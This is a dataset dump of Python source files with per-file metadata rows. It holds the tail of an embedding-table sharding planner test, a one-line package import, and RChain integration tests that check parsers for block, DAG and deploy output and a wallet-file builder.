sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=4
),
"table_2": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=7
),
"table_3": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
}
tables = [
EmbeddingBagConfig(
num_embeddings=128,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[HostLevelSharder()],
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
expected_ranks = {
"table_0": [8, 9, 10, 11, 12, 13, 14, 15],
"table_1": [0, 1, 2, 3, 4, 5, 6, 7, 0, 1],
"table_2": [8, 9, 10, 11, 12, 13, 14, 15],
"table_3": [0, 1, 2, 3, 4, 5, 6, 7],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
def test_twrw_and_twcw_cohost(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
"table_1": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=4
),
"table_2": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=7
),
"table_3": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
}
tables = [
EmbeddingBagConfig(
num_embeddings=128,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[HostLevelSharder()],
)
for i, sharding_option in enumerate(sharding_options):
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
if i <= 2:
sharding_option.dependency = "host_0"
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
expected_ranks = {
"table_0": [0, 1, 2, 3, 4, 5, 6, 7],
"table_1": [0, 1, 2, 3, 4, 5, 6, 7, 0, 1],
"table_2": [2, 3, 4, 5, 6, 7, 0, 1],
"table_3": [8, 9, 10, 11, 12, 13, 14, 15],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
# pyre-ignore [16]
solution_topology = self.partitioner._topology
for i in range(self.topology.world_size):
total_storage = Storage(0, 0)
total_perf = 0
for sharding_option in sharding_plan:
for shard in sharding_option.shards:
if shard.rank == i:
total_storage += cast(Storage, shard.storage)
total_perf += shard.perf
self.assertEqual(
solution_topology.devices[i].storage + total_storage,
self.topology.devices[i].storage,
)
self.assertEqual(solution_topology.devices[i].perf, total_perf)
def test_oom(self) -> None:
self.topology = Topology(
world_size=2, local_world_size=1, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
"table_1": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=4
),
"table_2": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=7
),
"table_3": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
}
tables = [
EmbeddingBagConfig(
num_embeddings=128,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[HostLevelSharder()],
)
for i, sharding_option in enumerate(sharding_options):
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(
# pyre-ignore [6]
hbm=self.topology.devices[0].storage.hbm / 2,
# pyre-ignore [6]
ddr=self.topology.devices[0].storage.ddr / 2,
)
sharding_option.partition_by = PartitionByType.HOST.value
if i <= 2:
sharding_option.dependency = "host_0"
with self.assertRaises(PlannerError):
self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
| 36.579817 | 88 | 0.591342 | 2,055 | 19,936 | 5.545012 | 0.089538 | 0.060202 | 0.031593 | 0.022115 | 0.866871 | 0.85441 | 0.835103 | 0.808337 | 0.798947 | 0.789381 | 0 | 0.03734 | 0.312199 | 19,936 | 544 | 89 | 36.647059 | 0.793684 | 0.019011 | 0 | 0.656587 | 0 | 0 | 0.022821 | 0 | 0 | 0 | 0 | 0 | 0.045356 | 1 | 0.041037 | false | 0 | 0.025918 | 0.021598 | 0.101512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c3af52ea76f81bce8055804eeaef5872fe35d37 | 30 | py | Python | pybot/plugins/api/__init__.py | harikrishnana2021/operationcode-pybot | 6e78e069c274281d50dcb71b98b9f485afb012fc | [
"MIT"
] | null | null | null | pybot/plugins/api/__init__.py | harikrishnana2021/operationcode-pybot | 6e78e069c274281d50dcb71b98b9f485afb012fc | [
"MIT"
] | null | null | null | pybot/plugins/api/__init__.py | harikrishnana2021/operationcode-pybot | 6e78e069c274281d50dcb71b98b9f485afb012fc | [
"MIT"
] | null | null | null | from .plugin import APIPlugin
| 15 | 29 | 0.833333 | 4 | 30 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1c4f9119b59a7242e19b3d6447984e95f84a8d19 | 19,955 | py | Python | integration-tests/test/test_internal.py | guilhermehas/rchain | 3fd2a1924e828de18204ac100bff60a6090621e1 | [
"Apache-2.0"
] | null | null | null | integration-tests/test/test_internal.py | guilhermehas/rchain | 3fd2a1924e828de18204ac100bff60a6090621e1 | [
"Apache-2.0"
] | 7 | 2019-12-27T14:15:35.000Z | 2019-12-30T01:06:20.000Z | integration-tests/test/test_internal.py | woky/rchain | 76ba93f4349fa525eb08d0b3f1751c23e0de74e2 | [
"Apache-2.0"
] | null | null | null | """Tests for the testing code itself."""
from rchain.crypto import PrivateKey
from .conftest import (
make_wallets_file_lines,
)
from .utils import(
extract_block_hash_from_propose_output,
extract_block_count_from_show_blocks,
parse_show_blocks_output,
parse_show_block_output,
parse_mvdag_str,
extract_deploy_id_from_deploy_output,
)
def test_blocks_count_from_show_blocks() -> None:
show_blocks_output = '''------------- block 0 ---------------
blockHash: "1b69a62e5d4d57173efd918d828f3308f801a0867a22fc942b4a4775ae896958"
sender: ""
seqNum: 0
sig: ""
sigAlgorithm: ""
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1575005928241
headerExtraBytes: ""
blockNumber: 0
preStateHash: "6284b05545513fead17c469aeb6baa2a11ed5a86eeda57accaa3bb95d60d5250"
postStateHash: "de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865"
bodyExtraBytes: ""
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 15
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 20
}
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 60
}
blockSize: "192205"
deployCount: 11
faultTolerance: 0.2631579
-----------------------------------------------------
count: 22
'''
assert extract_block_count_from_show_blocks(show_blocks_output) == 22
def test_parse_show_blocks_output() -> None:
input = '''
------------- block 1 ---------------
blockHash: "91979d8509e6ff886d54475e7519f23631205957cb3396bb9d1e0371aa01b02a"
sender: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
seqNum: 1
sig: "304502210086fcc0e8e0cb391275196711f11705cddf6724498965b68a34705d3631290bed022012c661bc2102c61443ed7649dbdcf76aa35780153f90210ddf69a708467c5bbf"
sigAlgorithm: "secp256k1"
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1575009346798
headerExtraBytes: ""
parentsHashList: "2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c"
blockNumber: 1
preStateHash: "de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865"
postStateHash: "ce921313bee2afe2f20818931f0580b2fa86594eb8eaba3ff2bc3686d703e8b5"
bodyExtraBytes: ""
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 60
}
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 15
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 20
}
blockSize: "20939"
deployCount: 1
faultTolerance: 0.57894737
-----------------------------------------------------
------------- block 0 ---------------
blockHash: "2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c"
sender: ""
seqNum: 0
sig: ""
sigAlgorithm: ""
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1575008703176
headerExtraBytes: ""
blockNumber: 0
preStateHash: "6284b05545513fead17c469aeb6baa2a11ed5a86eeda57accaa3bb95d60d5250"
postStateHash: "de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865"
bodyExtraBytes: ""
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 15
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 20
}
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 60
}
blockSize: "192205"
deployCount: 11
faultTolerance: 1.0
-----------------------------------------------------
count: 2
'''
blocks = parse_show_blocks_output(input)
assert len(blocks) == 2
block1 = blocks[0]
assert block1.block_hash == '91979d8509e6ff886d54475e7519f23631205957cb3396bb9d1e0371aa01b02a'
assert block1.sender == '0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb'
assert block1.seq_num == 1
assert block1.sig == '304502210086fcc0e8e0cb391275196711f11705cddf6724498965b68a34705d3631290bed022012c661bc2102c61443ed7649dbdcf76aa35780153f90210ddf69a708467c5bbf'
assert block1.sig_algorithm == 'secp256k1'
assert block1.shard_id == 'rchain'
assert block1.extra_bytes == ''
assert block1.version == '1'
assert block1.timestamp == 1575009346798
assert block1.header_extra_bytes == ''
assert block1.parents == ['2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c']
assert block1.block_number == 1
assert block1.pre_state_hash == 'de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865'
assert block1.post_state_hash == 'ce921313bee2afe2f20818931f0580b2fa86594eb8eaba3ff2bc3686d703e8b5'
assert block1.body_extra_bytes == ''
assert block1.block_size == 20939
assert block1.deploy_count == 1
assert block1.fault_tolerance == 0.57894737
assert block1.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 60,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 15,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 20
}
block2 = blocks[1]
assert block2.block_hash == '2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c'
assert block2.sender == ''
assert block2.seq_num == 0
assert block2.sig == ''
assert block2.sig_algorithm == ''
assert block2.shard_id == 'rchain'
assert block2.extra_bytes == ''
assert block2.version == '1'
assert block2.timestamp == 1575008703176
assert block2.header_extra_bytes == ''
assert block2.parents == []
assert block2.block_number == 0
assert block2.pre_state_hash == '6284b05545513fead17c469aeb6baa2a11ed5a86eeda57accaa3bb95d60d5250'
assert block2.post_state_hash == 'de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865'
assert block2.body_extra_bytes == ''
assert block2.block_size == 192205
assert block2.deploy_count == 11
assert block2.fault_tolerance == 1.0
assert block2.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 60,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 15,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 20
}
def test_parse_show_block_output() -> None:
input = r'''blockInfo {
blockHash: "b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf"
sender: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
seqNum: 1
sig: "304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8"
sigAlgorithm: "secp256k1"
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1574992953104
headerExtraBytes: ""
parentsHashList: "a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394b"
parentsHashList: "a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394c"
blockNumber: 1
preStateHash: "d602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8"
postStateHash: "62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1"
bodyExtraBytes: ""
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 79
}
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 52
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 56
}
blockSize: "20939"
deployCount: 1
faultTolerance: -1.0
}
deploys {
deployer: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
term: "@0!(2)"
timestamp: 1574992934035
sig: "3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605"
sigAlgorithm: "secp256k1"
phloPrice: 1
phloLimit: 100000
validAfterBlockNumber: -1
cost: 0
errored: false
systemDeployError: "Deploy payment failed: Insufficient funds"
}
'''
block = parse_show_block_output(input)
assert block.block_hash == 'b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf'
assert block.sender == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert block.seq_num == 1
assert block.sig == '304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8'
assert block.sig_algorithm == 'secp256k1'
assert block.shard_id == 'rchain'
assert block.extra_bytes == ''
assert block.version == '1'
assert block.timestamp == 1574992953104
assert block.header_extra_bytes == ''
assert block.block_number == 1
assert block.pre_state_hash == 'd602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8'
assert block.post_state_hash == '62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1'
assert block.body_extra_bytes == ''
assert block.block_size == 20939
assert block.deploy_count == 1
assert block.fault_tolerance == -1.0
assert block.parents == ['a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394b', 'a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394c']
assert block.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 79,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 52,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 56
}
deploy = block.deploys[0]
assert deploy.deployer == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert deploy.term == "@0!(2)"
assert deploy.timestamp == 1574992934035
assert deploy.sig == '3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605'
assert deploy.sig_algorithm == 'secp256k1'
assert deploy.phlo_price == 1
assert deploy.phlo_limit == 100000
assert deploy.valid_after_block_number == -1
assert deploy.cost == 0
assert deploy.error == 'false'
assert deploy.system_deploy_error == 'Deploy payment failed: Insufficient funds'
def test_parse_show_block_output_without_parents() -> None:
input = r'''blockInfo {
blockHash: "b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf"
sender: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
seqNum: 1
sig: "304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8"
sigAlgorithm: "secp256k1"
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1574992953104
headerExtraBytes: ""
blockNumber: 1
preStateHash: "d602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8"
postStateHash: "62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1"
bodyExtraBytes: ""
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 79
}
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 52
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 56
}
blockSize: "20939"
deployCount: 1
faultTolerance: -1.0
}
deploys {
deployer: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
term: "@0!(2)"
timestamp: 1574992934035
sig: "3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605"
sigAlgorithm: "secp256k1"
phloPrice: 1
phloLimit: 100000
validAfterBlockNumber: -1
cost: 0
errored: false
systemDeployError: "Deploy payment failed: Insufficient funds"
}
'''
block = parse_show_block_output(input)
assert block.block_hash == 'b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf'
assert block.sender == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert block.seq_num == 1
assert block.sig == '304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8'
assert block.sig_algorithm == 'secp256k1'
assert block.shard_id == 'rchain'
assert block.extra_bytes == ''
assert block.version == '1'
assert block.timestamp == 1574992953104
assert block.header_extra_bytes == ''
assert block.block_number == 1
assert block.pre_state_hash == 'd602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8'
assert block.post_state_hash == '62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1'
assert block.body_extra_bytes == ''
assert block.block_size == 20939
assert block.deploy_count == 1
assert block.fault_tolerance == -1.0
assert block.parents == []
assert block.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 79,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 52,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 56
}
deploy = block.deploys[0]
assert deploy.deployer == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert deploy.term == "@0!(2)"
assert deploy.timestamp == 1574992934035
assert deploy.sig == '3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605'
assert deploy.sig_algorithm == 'secp256k1'
assert deploy.phlo_price == 1
assert deploy.phlo_limit == 100000
assert deploy.valid_after_block_number == -1
assert deploy.cost == 0
assert deploy.error == 'false'
assert deploy.system_deploy_error == 'Deploy payment failed: Insufficient funds'
def test_extract_block_hash_from_propose_output() -> None:
response = "Response: Success! Block a91208047c created and added.\n"
assert extract_block_hash_from_propose_output(response) == "a91208047c"
def test_make_wallets_file_lines() -> None:
wallets_map = {
PrivateKey.from_hex("80366db5fbb8dad7946f27037422715e4176dda41d582224db87b6c3b783d709"): 40,
PrivateKey.from_hex("120d42175739387af0264921bb117e4c4c05fbe2ce5410031e8b158c6e414bb5"): 45,
PrivateKey.from_hex("1f52d0bce0a92f5c79f2a88aae6d391ddf853e2eb8e688c5aa68002205f92dad"): 26
}
output = make_wallets_file_lines(wallets_map)
assert output == [
'26218db6e5a2eed1901f72cea58fda7ef1f602c6,40,0',
'42c828c183163cb50f6ad5207a10899b59aae91c,45,0',
'2a11fd494610330f3b522562f7204670f8928133,26,0',
]
def test_parse_mvdag_str() -> None:
input = """d5db034e82e10ee1037454a70737ac9e1a6f4900d28590776b5ccc5eef087312 a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7
a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7 9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8
3851ce1c5f7a26b444c45edde5cff7fae20aa5b90aa6ce882f058c7834d748d6 9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8
f591cea354b70a9c6b753d13d8912d7fd0219fd45b80f449a08431cb6b265ea2 9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8
9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8 b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907
879b1499c4bb5b8359559ab2a308ce76dd01ae1a3693f0edbdbf4a7126767d93 b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907
b52e9a808053703353a16ea85a4cda5820a2af115bad87b6cebfef03111f5541 b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907
b0880ca496258ebd0c8c36446ac7596681600e3ab90a9db44b464dd4767f5adf 9547694c620c3e78b39da3db3a2090aa863a0c1174686a4de105350f7d4e77f4"""
dag = parse_mvdag_str(input)
assert dag == {
"d5db034e82e10ee1037454a70737ac9e1a6f4900d28590776b5ccc5eef087312": set(['a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7']),
"a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7": set(['9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8']),
"3851ce1c5f7a26b444c45edde5cff7fae20aa5b90aa6ce882f058c7834d748d6": set(['9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8']),
"f591cea354b70a9c6b753d13d8912d7fd0219fd45b80f449a08431cb6b265ea2": set(['9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8']),
"9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8": set(['b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907']),
"879b1499c4bb5b8359559ab2a308ce76dd01ae1a3693f0edbdbf4a7126767d93": set(['b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907']),
"b52e9a808053703353a16ea85a4cda5820a2af115bad87b6cebfef03111f5541": set(['b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907']),
"b0880ca496258ebd0c8c36446ac7596681600e3ab90a9db44b464dd4767f5adf": set(['9547694c620c3e78b39da3db3a2090aa863a0c1174686a4de105350f7d4e77f4']),
}
def test_parse_deploy_str() -> None:
input = """Response: Success!
DeployId is: 3045022100970e70a1e00751df2c4bb3475b1eae8ca15f81711dcdd89136608b0bc3d144ea022038f935b2dc7de76c8543bf89a8515469fcab55fdabf0ce907f40d211fae438a5
"""
deploy_id = extract_deploy_id_from_deploy_output(input)
assert deploy_id == "3045022100970e70a1e00751df2c4bb3475b1eae8ca15f81711dcdd89136608b0bc3d144ea022038f935b2dc7de76c8543bf89a8515469fcab55fdabf0ce907f40d211fae438a5"
